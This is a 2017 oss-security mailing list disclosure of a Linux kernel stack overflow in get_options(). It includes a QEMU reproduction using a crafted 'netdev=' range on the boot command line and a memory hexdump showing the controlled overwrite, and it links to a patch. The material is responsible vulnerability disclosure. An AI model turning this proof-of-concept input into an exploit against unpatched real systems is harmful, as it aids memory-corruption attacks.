Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-Id: <EBDB967B-92F8-47B9-AC79-CBF338A835F2@gmail.com>
Date: Tue, 30 May 2017 08:17:54 +0400
From: Ilya Matveychikov <matvejchikov@...il.com>
To: oss-security@...ts.openwall.com
Cc: Roee Hay <roeehay@...il.com>
Subject: Linux kernel: stack buffer overflow with controlled payload in get_options() function

Hello,

I’ve found the bug in get_options() function which is used for parsing
kernel’s cmdline string. The bug is similar to CVE-2017-1000363 described
by Roee Hay (https://alephsecurity.com/vulns/aleph-2017023).

Details
=======

When using get_options() it's possible to specify a range of numbers,
like 1-100500. The problem is that it doesn't track array size while
calling internally to get_range() which iterates over the range and
fills the memory with numbers.

Given that one can use “netdev=min-max” option to cause stack overflow
with controlled payload. Here are some simple steps to reproduce the
problem in QEMU-based virtual environment:

1) Run kernel in QEMU and wait for system halt:

  $ qemu-system-x86_64 -no-reboot -no-shutdown -kernel \
    /boot/vmlinuz-4.4.0-66-generic -append "netdev=3735928559-3735999999"

2) After the system halt enter in QEMU console by pressing Ctrl-Alt-2 and dump
  all the guest's machine memory:

  compat_monitor0 console
  QEMU 2.5.0 monitor - type 'help' for more information
  (qemu) dump-gest-memory dump <ENTER>
  (qemu) quit <ENTER>

3) Look for pair of magic numbers (deadbeef,deadbef0) in "dump" file:

  $ hexdump -C dump | grep "ef be ad de f0 be ad de"
  01de42e0  ef be ad de f0 be ad de  f1 be ad de f2 be ad de  |................|

4) Follow address <01de42e0> in hexdump:

  01de42e0  ef be ad de f0 be ad de  f1 be ad de f2 be ad de  |................|
  01de42f0  f3 be ad de f4 be ad de  f5 be ad de f6 be ad de  |................|
  01de4300  f7 be ad de f8 be ad de  f9 be ad de fa be ad de  |................|
  01de4310  fb be ad de fc be ad de  fd be ad de fe be ad de  |................|
  01de4320  ff be ad de 00 bf ad de  01 bf ad de 02 bf ad de  |................|
  01de4330  03 bf ad de 04 bf ad de  05 bf ad de 06 bf ad de  |................|
  01de4340  07 bf ad de 08 bf ad de  09 bf ad de 0a bf ad de  |................|
  01de4350  0b bf ad de 0c bf ad de  0d bf ad de 0e bf ad de  |................|
  01de4360  0f bf ad de 10 bf ad de  11 bf ad de 12 bf ad de  |................|
  01de4370  13 bf ad de 14 bf ad de  15 bf ad de 16 bf ad de  |................|
  01de4380  17 bf ad de 18 bf ad de  19 bf ad de 1a bf ad de  |................|
  01de4390  1b bf ad de 1c bf ad de  1d bf ad de 1e bf ad de  |................|
  01de43a0  1f bf ad de 20 bf ad de  21 bf ad de 22 bf ad de  |.... ...!..."...|
  01de43b0  23 bf ad de 24 bf ad de  25 bf ad de 26 bf ad de  |#...$...%...&...|
  01de43c0  27 bf ad de 28 bf ad de  29 bf ad de 2a bf ad de  |'...(...)...*...|
  01de43d0  2b bf ad de 2c bf ad de  2d bf ad de 2e bf ad de  |+...,...-.......|
  01de43e0  2f bf ad de 30 bf ad de  31 bf ad de 32 bf ad de  |/...0...1...2...|
  01de43f0  33 bf ad de 34 bf ad de  35 bf ad de 36 bf ad de  |3...4...5...6...|
  01de4400  37 bf ad de 38 bf ad de  39 bf ad de 3a bf ad de  |7...8...9...:...|
  01de4410  3b bf ad de 3c bf ad de  3d bf ad de 3e bf ad de  |;...<...=...>...|
  01de4420  3f bf ad de 40 bf ad de  41 bf ad de 42 bf ad de  |?...@...A...B...|
  01de4430  43 bf ad de 44 bf ad de  45 bf ad de 46 bf ad de  |C...D...E...F...|
  01de4440  47 bf ad de 48 bf ad de  49 bf ad de 4a bf ad de  |G...H...I...J...|
  01de4450  4b bf ad de 4c bf ad de  4d bf ad de 4e bf ad de  |K...L...M...N...|
  01de4460  4f bf ad de 50 bf ad de  51 bf ad de 52 bf ad de  |O...P...Q...R...|
  01de4470  53 bf ad de 54 bf ad de  55 bf ad de 56 bf ad de  |S...T...U...V...|
  01de4480  57 bf ad de 58 bf ad de  59 bf ad de 5a bf ad de  |W...X...Y...Z...|
  01de4490  5b bf ad de 5c bf ad de  5d bf ad de 5e bf ad de  |[...\...]...^...|
  01de44a0  5f bf ad de 60 bf ad de  61 bf ad de 62 bf ad de  |_...`...a...b...|
  01de44b0  63 bf ad de 64 bf ad de  65 bf ad de 66 bf ad de  |c...d...e...f...|
  01de44c0  67 bf ad de 68 bf ad de  69 bf ad de 6a bf ad de  |g...h...i...j...|
  01de44d0  6b bf ad de 6c bf ad de  6d bf ad de 6e bf ad de  |k...l...m...n...|
  01de44e0  6f bf ad de 70 bf ad de  71 bf ad de 72 bf ad de  |o...p...q...r...|
  01de44f0  73 bf ad de 74 bf ad de  75 bf ad de 76 bf ad de  |s...t...u...v...|
  01de4500  77 bf ad de 78 bf ad de  79 bf ad de 7a bf ad de  |w...x...y...z...|
  01de4510  7b bf ad de 7c bf ad de  7d bf ad de 7e bf ad de  |{...|...}...~...|
  01de4520  7f bf ad de 80 bf ad de  81 bf ad de 82 bf ad de  |................|
  01de4530  83 bf ad de 84 bf ad de  85 bf ad de 86 bf ad de  |................|
  01de4540  87 bf ad de 88 bf ad de  89 bf ad de 8a bf ad de  |................|
  01de4550  8b bf ad de 8c bf ad de  8d bf ad de 8e bf ad de  |................|
  ...

The patch for the bug was submitted by me to LKML list recently:
https://lkml.org/lkml/2017/5/22/581

This was reported to security@...nel.org, also.

Ilya Matveychikov

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.